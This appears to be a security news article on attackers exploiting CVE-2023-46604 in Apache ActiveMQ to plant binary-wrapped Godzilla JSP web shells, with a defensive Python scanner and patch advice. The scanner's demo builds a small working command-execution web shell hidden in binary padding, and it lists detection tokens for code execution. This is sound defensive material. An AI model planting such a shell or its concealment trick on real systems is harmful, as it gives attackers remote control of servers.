Cybersecurity researchers are warning of a "notable increase" in threat actor activity exploiting a now-patched flaw in Apache ActiveMQ to deliver the Godzilla web shell on compromised hosts.
"The web shells are concealed within an unknown binary format and are designed to evade security and signature-based scanners," Trustwave said. "Notably, despite the binary's unknown file format, ActiveMQ's JSP engine continues to compile and execute the web shell."
CVE-2023-46604 (CVSS score: 10.0) is a critical vulnerability in Apache ActiveMQ that allows remote code execution; it stems from unsafe deserialization of OpenWire protocol messages, which lets an unauthenticated client on the broker port instantiate an arbitrary class on the server. Since its public disclosure in late October 2023, it has come under active exploitation by multiple adversaries to deploy ransomware, rootkits, cryptocurrency miners, and DDoS botnets.

In the latest intrusion set observed by Trustwave, vulnerable instances were targeted with JSP-based web shells planted inside the "admin" folder of the ActiveMQ installation directory (the web console's webapp directory, served by the broker's embedded Jetty).
The web shell, named Godzilla, is a feature-rich backdoor capable of parsing inbound HTTP POST requests, executing the content, and returning the results in the form of an HTTP response.
"What makes these malicious files particularly noteworthy is how the JSP code appears to be concealed within an unknown type of binary," security researcher Rodel Mendrez said. "This method has the potential to circumvent security measures, evading detection by security endpoints during scanning."
A closer examination of the attack chain shows that the web shell code is converted into Java code prior to its execution by the Jetty Servlet Engine. This is why the binary wrapper does not break execution: a JSP compiler treats everything outside the <% ... %> delimiters as static template text to be written to the response, so arbitrary bytes before and after the scriptlet are simply emitted as output while the scriptlet itself is compiled and run. Signature scanners that key on a recognisable file header or a plain-text JSP, on the other hand, never see the payload.
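The following scanner, added here as an illustration and not part of Trustwave's research or tooling, applies that observation defensively: it walks a directory (by default the `webapps/admin` folder of an ActiveMQ install, assumed here) and flags any file that contains compilable `<% ... %>` segments while consisting largely of non-printable bytes, or that is not even named like a JSP. The embedded sample files, including the "wrapped" shell, are constructed for the demo and are not Godzilla's real code; the list of suspicious tokens is a heuristic of my choosing.

```python
import os
import re
import tempfile
from typing import Dict, List

# Jasper treats bytes outside these delimiters as static template text, so a
# file with an opaque binary header still compiles if it contains <% ... %>.
JSP_TAG = re.compile(rb"<%[@!=]?(.*?)%>", re.DOTALL)

# Heuristic tokens that indicate code execution or class loading inside a
# scriptlet. Chosen for this example; legitimate console JSPs rarely use them.
SUSPICIOUS = (b"Runtime", b"ProcessBuilder", b"defineClass", b"ClassLoader", b"Cipher")


def extract_jsp_segments(data: bytes) -> List[bytes]:
    """Return every <% ... %> block found anywhere in the byte stream."""
    return [m.group(0) for m in JSP_TAG.finditer(data)]


def nonprintable_ratio(data: bytes) -> float:
    """Share of bytes that are neither printable ASCII nor tab/CR/LF."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return 1.0 - printable / len(data)


def analyze_file(path: str) -> Dict:
    with open(path, "rb") as fh:
        data = fh.read()
    segments = extract_jsp_segments(data)
    ratio = nonprintable_ratio(data)
    hits = sorted({t.decode() for seg in segments for t in SUSPICIOUS if t in seg})
    # "Wrapped" JSP: scriptlets present, but the file is mostly binary or is
    # not even named as a JSP. Either is abnormal for a shipped console page.
    wrapped = bool(segments) and (ratio > 0.10 or not path.lower().endswith((".jsp", ".jspx")))
    return {
        "path": path,
        "segments": len(segments),
        "nonprintable_ratio": round(ratio, 3),
        "indicators": hits,
        "suspicious": wrapped or bool(hits),
    }


def scan_admin_dir(root: str) -> List[Dict]:
    """Walk the console webapp directory and return only suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            result = analyze_file(os.path.join(dirpath, name))
            if result["suspicious"]:
                findings.append(result)
    return findings


def build_sample_dir() -> Dict[str, str]:
    """Create a constructed 'admin' folder: one benign JSP, one image, one
    scriptlet hidden inside binary padding (not real Godzilla code)."""
    root = tempfile.mkdtemp(prefix="activemq_admin_")
    paths = {"root": root}
    paths["index"] = os.path.join(root, "index.jsp")
    with open(paths["index"], "wb") as fh:
        fh.write(b'<%@ page contentType="text/html" %>\n'
                 b"<html><body>Queues: <%= 3 %></body></html>\n")
    paths["png"] = os.path.join(root, "logo.png")
    with open(paths["png"], "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 2)
    paths["shell"] = os.path.join(root, "shell.jsp")
    with open(paths["shell"], "wb") as fh:
        fh.write(b"\x00\x01\x7f\xfe" * 40                       # opaque header
                 + b'<%@ page import="java.util.*" %>'
                 + b'<% String c = request.getParameter("cmd"); '
                 + b"Runtime.getRuntime().exec(c); %>"
                 + b"\xff\xfe\x00" * 50)                        # opaque trailer
    return paths


if __name__ == "__main__":
    samples = build_sample_dir()
    for finding in scan_admin_dir(samples["root"]):
        print(finding)
```

Run it against a real install as `scan_admin_dir("/opt/activemq/webapps/admin")` (path assumed; adjust to your layout). The heuristic is deliberately content-based rather than signature-based, but it is still only a triage aid: the authoritative check is a hash comparison of every file under `webapps/` against a pristine copy of the same ActiveMQ release, since nothing in a shipped console should differ.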
The JSP payload ultimately lets the threat actor connect to the web shell through the Godzilla management user interface and gain full control of the target host, including executing arbitrary shell commands, viewing network information, and performing file management operations.
Users of Apache ActiveMQ are strongly advised to update to a fixed release (5.15.16, 5.16.7, 5.17.6, or 5.18.3 and later) as soon as possible. Because the vulnerability is reachable over the OpenWire broker port rather than the web console, restricting network access to that port is a worthwhile compensating control, and hosts that were exposed before patching should have the console's webapp directory checked for files that were not part of the shipped distribution.
Some parts of this article are sourced from:
thehackernews.com